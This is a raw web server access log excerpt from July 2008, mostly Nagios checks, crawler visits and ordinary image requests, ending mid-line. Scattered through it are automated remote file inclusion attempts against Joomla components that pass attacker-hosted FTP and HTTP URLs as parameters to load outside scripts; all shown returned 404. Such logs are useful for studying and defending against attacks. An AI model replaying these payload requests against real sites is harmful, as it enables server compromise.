87.218.101.176 - - [01/Jul/2008:04:10:52 -0400] "GET /logs/access_log.Q106123000 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:52 -0400] "GET /logs/access_log.Q106123100 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:53 -0400] "GET /logs/access_log.Q107010100 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:54 -0400] "GET /logs/access_log.Q107010200 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:54 -0400] "GET /logs/access_log.Q107010300 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
87.218.101.176 - - [01/Jul/2008:04:10:56 -0400] "GET /logs/access_log.Q107010400 HTTP/1.1" 404 224 "-" "Java/1.6.0_03"
209.59.12.99 - - [01/Jul/2008:04:14:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.163 - - [01/Jul/2008:04:19:32 -0400] "GET /scripts/browser_konq.js HTTP/1.0" 200 6887 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [01/Jul/2008:04:19:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.233.151.54 - - [01/Jul/2008:04:20:20 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.233.151.54 - - [01/Jul/2008:04:20:20 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [01/Jul/2008:04:24:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.49.13.112 - - [01/Jul/2008:04:28:07 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
65.49.13.112 - - [01/Jul/2008:04:28:08 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
65.49.13.112 - - [01/Jul/2008:04:28:08 -0400] "GET /joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
65.49.13.112 - - [01/Jul/2008:04:28:08 -0400] "GET /joomla/index.php?option=com_restaurante&task=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
70.87.14.26 - - [01/Jul/2008:04:29:17 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
70.87.14.26 - - [01/Jul/2008:04:29:17 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
209.59.12.99 - - [01/Jul/2008:04:29:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.38.46.234 - - [01/Jul/2008:04:31:58 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
64.38.46.234 - - [01/Jul/2008:04:31:58 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
82.94.229.50 - - [01/Jul/2008:04:33:17 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.64"
82.94.229.50 - - [01/Jul/2008:04:33:17 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.64"
209.59.12.99 - - [01/Jul/2008:04:35:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.50 - - [01/Jul/2008:04:37:12 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.50 - - [01/Jul/2008:04:37:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54456 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [01/Jul/2008:04:40:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.10.47.122 - - [01/Jul/2008:04:43:52 -0400] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
72.10.47.122 - - [01/Jul/2008:04:43:52 -0400] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
213.254.214.2 - - [01/Jul/2008:04:45:01 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
213.254.214.2 - - [01/Jul/2008:04:45:01 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
209.59.12.99 - - [01/Jul/2008:04:45:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.254.214.2 - - [01/Jul/2008:04:48:56 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
213.254.214.2 - - [01/Jul/2008:04:48:57 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
213.254.214.2 - - [01/Jul/2008:04:49:01 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
213.254.214.2 - - [01/Jul/2008:04:49:01 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
209.59.12.99 - - [01/Jul/2008:04:50:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.233.151.54 - - [01/Jul/2008:04:51:46 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.233.151.54 - - [01/Jul/2008:04:51:46 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
86.141.244.44 - - [01/Jul/2008:04:53:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
86.141.244.44 - - [01/Jul/2008:04:53:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
86.141.244.44 - - [01/Jul/2008:04:53:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
86.141.244.44 - - [01/Jul/2008:04:53:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
209.59.12.99 - - [01/Jul/2008:04:55:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:05:00:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [01/Jul/2008:05:05:57 -0400] "GET / HTTP/1.0" 200 409 "-" "chec